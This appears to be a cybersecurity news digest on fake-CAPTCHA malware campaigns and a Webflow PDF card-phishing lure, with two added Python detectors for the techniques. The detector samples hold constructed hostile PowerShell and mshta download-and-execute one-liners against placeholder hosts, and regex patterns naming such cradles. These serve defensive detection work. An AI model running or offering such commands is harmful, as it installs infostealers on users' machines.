CyberSecurity news

FlagThis - #captcha

Andres Ramos@Arctic Wolf //
A resurgence of the fake CAPTCHA malware campaign has been observed: threat actors are compromising widely used websites across industries and injecting a fake CAPTCHA challenge that redirects victims to a page designed to get them to execute PowerShell. The campaign relies on social engineering and fake software downloads to talk users into running the malicious script themselves.

The same tactic is used with fake CAPTCHAs that mimic legitimate verification pages: when users try to pass the check, they are instructed to run a command that the page has already copied to their clipboard. The OBSCURE#BAT campaign, delivered this way, is a serious threat to both individuals and organizations because it compromises sensitive data while using advanced evasion techniques, including API hooking, to hide its files and registry entries from inspection and so make detection difficult.

References :
  • Arctic Wolf: Widespread Fake CAPTCHA Campaign Delivering Malware
  • hackread.com: New OBSCURE#BAT Malware Targets Users with Fake Captchas
  • Security Risk Advisors: 🚩 Fake CAPTCHA Malware Campaign Resurges With Multi-Stage PowerShell Infostealers
  • SpiderLabs Blog: Resurgence of a Fake Captcha Malware Campaign
  • www.zdnet.com: That weird CAPTCHA could be a malware trap - here's how to protect yourself
  • Seceon Inc: Beware of Fake CAPTCHA Scams: How Cybercriminals Are Hijacking Your Clipboard to Steal Data
  • www.cysecurity.news: Fake CAPTCHA Scams Trick Windows Users into Downloading Malware
  • Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT
  • Broadcom Software Blogs: In a recent surge of sophisticated cyber threats, attackers are exploiting fake CAPTCHA verifications to hijack users’ clipboards, leading to the installation of information-stealing malware.
  • Security Risk Advisors: ClearFake injects JavaScript to show fake CAPTCHAs on compromised sites, tricking users into running PowerShell for Lumma/Vidar malware.
  • www.cisecurity.org: The CIS CTI team spotted a Lumma Stealer campaign where SLTT victims were redirected to malicious webpages delivering fake CAPTCHA verifications.
  • gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
  • Sucuri Blog: Fake Cloudflare Verification Results in LummaStealer Trojan Infections
  • securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites
@www.infosecurity-magazine.com //
Attackers are exploiting users' familiarity with CAPTCHAs to distribute Lumma Stealer, an infostealer (the source reporting describes it as a RAT), via malicious PowerShell commands. Potential victims are directed to attacker-controlled sites and prompted to complete a fake verification challenge; instead of a CAPTCHA, the page instructs them to press Windows + R and run a PowerShell command, under the false pretense that it is running "Windows Defender".

Users who follow the "verification" steps copy and run PowerShell that downloads and installs malware such as Lumma Stealer, which lets the attackers steal sensitive data such as cryptocurrency wallets. A related variant uses fake Cloudflare verification prompts served from infected WordPress sites to get users to run the same kind of PowerShell command and install the LummaStealer trojan.
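The chain described in the Arctic Wolf entry above and in this one (fake CAPTCHA, command placed on the clipboard, Windows + R, PowerShell) leaves two host artifacts that are easy to hunt on: a script interpreter spawned by explorer.exe with a download cradle, and the Explorer RunMRU registry values that record what was typed into the Run box. The detector below is an added example, not code from Arctic Wolf, Infosecurity Magazine or any vendor cited on this page; it assumes Sysmon Event ID 1 field names (Image, ParentImage, CommandLine), all sample records are constructed, and lure.invalid is a placeholder host.

```python
"""ClickFix / fake-CAPTCHA execution-chain detector (added example, constructed data)."""
import re
from dataclasses import dataclass

# Interpreters the lures tell victims to paste into the Run dialog
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Tokens that distinguish a pasted one-liner from something an admin would type
INDICATORS = {
    "download_cradle": re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b", re.I),
    "in_memory_exec":  re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "remote_url":      re.compile(r"\bhttps?://", re.I),
    "hidden_window":   re.compile(r"(?<![\w-])-w(?:indowstyle)?\s+hidden\b", re.I),
    "profile_bypass":  re.compile(r"(?<![\w-])-(?:nop|noprofile|ep\s+bypass|executionpolicy\s+bypass)\b", re.I),
    "encoded_command": re.compile(r"(?<![\w-])-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    # Lures pad the command with a comment so the Run box shows only reassuring text
    "lure_comment":    re.compile(r"#.*(not a robot|captcha|verification)", re.I),
}


@dataclass
class ProcEvent:
    image: str          # Sysmon EID 1 Image (assumed field name)
    parent_image: str   # Sysmon EID 1 ParentImage
    command_line: str   # Sysmon EID 1 CommandLine


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_interpreter(token: str) -> bool:
    name = basename(token.strip('"'))
    return name in INTERPRETERS or name + ".exe" in INTERPRETERS


def score_command(cmdline: str) -> list[str]:
    """Names of every lure indicator present in a command line."""
    return [name for name, rx in INDICATORS.items() if rx.search(cmdline)]


def classify(ev: ProcEvent) -> list[str]:
    """Reasons this event looks like a ClickFix chain; empty list if it does not.

    Win+R launches are children of explorer.exe, so the triad alerted on is
    explorer.exe parent + script interpreter + at least one lure indicator.
    A bare 'powershell' typed into the Run box scores nothing, which keeps
    ordinary interactive use quiet."""
    if not is_interpreter(ev.image):
        return []
    hits = score_command(ev.command_line)
    if basename(ev.parent_image) != "explorer.exe" or not hits:
        return []
    return ["parent_explorer"] + hits


def scan_runmru(values: dict[str, str]) -> list[tuple[str, list[str]]]:
    """Scan HKCU\\...\\Explorer\\RunMRU values, most recent first.

    Each value is stored as '<command>\\1'; MRUList lists the value names in
    most-recent-first order. Returns (value name, indicators) for entries that
    launch an interpreter with at least one indicator."""
    findings = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is None:
            continue
        cmd = raw[:-2] if raw.endswith("\\1") else raw
        parts = cmd.split()
        first = parts[0] if parts else ""
        hits = score_command(cmd)
        if is_interpreter(first) and hits:
            findings.append((name, hits))
    return findings


# Constructed sample records (not from any real incident)
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe",
              'powershell -w hidden -nop -c "iwr http://lure.invalid/v.txt | iex" '
              '# "I am not a robot - reCAPTCHA Verification ID: 7811"'),
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              "mshta https://lure.invalid/verify.mp4"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\cmd.exe",
              r"powershell -ExecutionPolicy Bypass -File C:\ops\backup.ps1"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", "powershell"),
]

SAMPLE_RUNMRU = {  # constructed RunMRU snapshot
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\1",
    "c": 'powershell -w hidden -c "irm https://lure.invalid/a | iex"\\1',
}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev.image), "<-", basename(ev.parent_image), classify(ev) or "clean")
    print("RunMRU:", scan_runmru(SAMPLE_RUNMRU))
```

The explorer.exe parent is the discriminator: a scheduled backup launched from cmd.exe with -ExecutionPolicy Bypass scores an indicator but is not flagged, while mshta fetching a remote "video" from the Run box is. RunMRU is worth collecting in incident response because it survives even when PowerShell logging was off at the time of the paste.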

References :
  • gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
  • securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites
  • www.cisecurity.org: Active Lumma Stealer Campaign Impacting U.S. SLTTs
  • Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT
@securityonline.info //
A phishing campaign is abusing the Webflow content delivery network (CDN) to steal credit card data and commit financial fraud. Attackers host fake PDF documents on Webflow that contain only a CAPTCHA image linked to a real Cloudflare Turnstile challenge; the genuine CAPTCHA both lends the lure credibility and defeats static scanners, since the PDF itself carries no script or payload, just an image and a link. The campaign targets people searching for documents on search engines and redirects them to the malicious PDFs.

The PDF mimics a CAPTCHA challenge: clicking the image takes the user to a genuine Cloudflare Turnstile check, which creates a false sense of legitimacy. After passing it, the victim lands on a page that asks for personal and credit card details in order to "download" the document. Submitting the card details yields an error message, and repeated submissions end at an HTTP 500 page, by which point the attackers already hold the data.
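Because the lure PDF contains no text, no script and no embedded file, a scanner that only looks for those will pass it. What it does contain is a link annotation whose target leaves the CDN the file was served from, and a page that is nothing but an image. The triage below extracts the /URI link targets and flags image-only documents with off-site links; it is an added example, not code from Netskope, The Hacker News or securityonline.info. Both PDFs are constructed stand-ins (object lengths and offsets are not meant to be valid), and cdn.example.invalid and docs.example.invalid are placeholder hosts.

```python
"""Static triage of CAPTCHA-in-a-PDF lures (added example, constructed data)."""
import re
from urllib.parse import urlsplit

URI_RE = re.compile(rb"/URI\s*\(((?:\\.|[^\\)])*)\)")   # literal-string /URI values
TEXT_RE = re.compile(rb"\bBT\b.*?\bET\b", re.S)          # any text object on a page
IMAGE_RE = re.compile(rb"/Subtype\s*/Image\b")           # any image XObject


def pdf_unescape(s: bytes) -> str:
    """Undo the PDF literal-string escapes that matter for URLs: \\( \\) and \\\\."""
    return re.sub(rb"\\([()\\])", rb"\1", s).decode("latin-1")


def extract_uris(pdf: bytes) -> list[str]:
    """All /URI action targets found in uncompressed object text."""
    return [pdf_unescape(m.group(1)) for m in URI_RE.finditer(pdf)]


def assess(pdf: bytes, hosting_host: str) -> dict:
    """Heuristic verdict: image-only PDF plus a link off the hosting origin = lure."""
    uris = extract_uris(pdf)
    offsite = [u for u in uris
               if (urlsplit(u).hostname or "").lower() != hosting_host.lower()]
    image_only = IMAGE_RE.search(pdf) is not None and TEXT_RE.search(pdf) is None
    return {
        "uris": uris,
        "offsite_links": offsite,
        "image_only": image_only,
        "verdict": "lure" if image_only and offsite else "ok",
    }


# Constructed lure: one page, one image, one link annotation, no text.
LURE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]
   /Resources << /XObject << /Im0 5 0 R >> >> /Contents 4 0 R /Annots [6 0 R] >> endobj
4 0 obj << /Length 35 >> stream
q 400 0 0 120 106 336 cm /Im0 Do Q
endstream endobj
5 0 obj << /Type /XObject /Subtype /Image /Width 1 /Height 1
   /ColorSpace /DeviceGray /BitsPerComponent 8 /Length 1 >> stream
\x00
endstream endobj
6 0 obj << /Type /Annot /Subtype /Link /Rect [106 336 506 456]
   /A << /S /URI /URI (https://verify.invalid/turnstile?doc=3c7a) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

# Constructed benign document: real text, link back to the same host.
BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]
   /Resources << /Font << /F1 5 0 R >> >> /Contents 4 0 R /Annots [6 0 R] >> endobj
4 0 obj << /Length 58 >> stream
BT /F1 12 Tf 72 700 Td (See appendix for detail) Tj ET
endstream endobj
5 0 obj << /Type /Font /Subtype /Type1 /BaseFont /Helvetica >> endobj
6 0 obj << /Type /Annot /Subtype /Link /Rect [72 680 300 712]
   /A << /S /URI /URI (https://docs.example.invalid/appendix.pdf) >> >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    print("lure  :", assess(LURE_PDF, "cdn.example.invalid"))
    print("benign:", assess(BENIGN_PDF, "docs.example.invalid"))
```

Two caveats for production use: the regex only sees annotations stored in plain object text, so inflate /FlateDecode streams and unpack object streams (/ObjStm) first, and treat the verdict as a triage signal rather than a block decision, since a legitimate flyer can also be a single image with an external link.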

References :
  • Talkback Resources: Hackers Use CAPTCHA Trick on Webflow CDN PDFs to Bypass Security Scanners
  • The Hacker News: Hackers Use CAPTCHA Trick on Webflow CDN PDFs to Bypass Security Scanners
  • securityonline.info: Sophisticated Phishing Campaign Abuses Webflow CDN to Steal Credit Card Data
Classification:
  • HashTags: #PhishingCampaign #WebflowCDN #CreditCardTheft
  • Company: Webflow
  • Target: credit card data
  • Product: Webflow CDN
  • Feature: genuine Cloudflare Turnstile CAPTCHA linked from an image-only PDF lure
  • Malware: none (credential-phishing lure, no payload)
  • Type: Phishing
  • Severity: Medium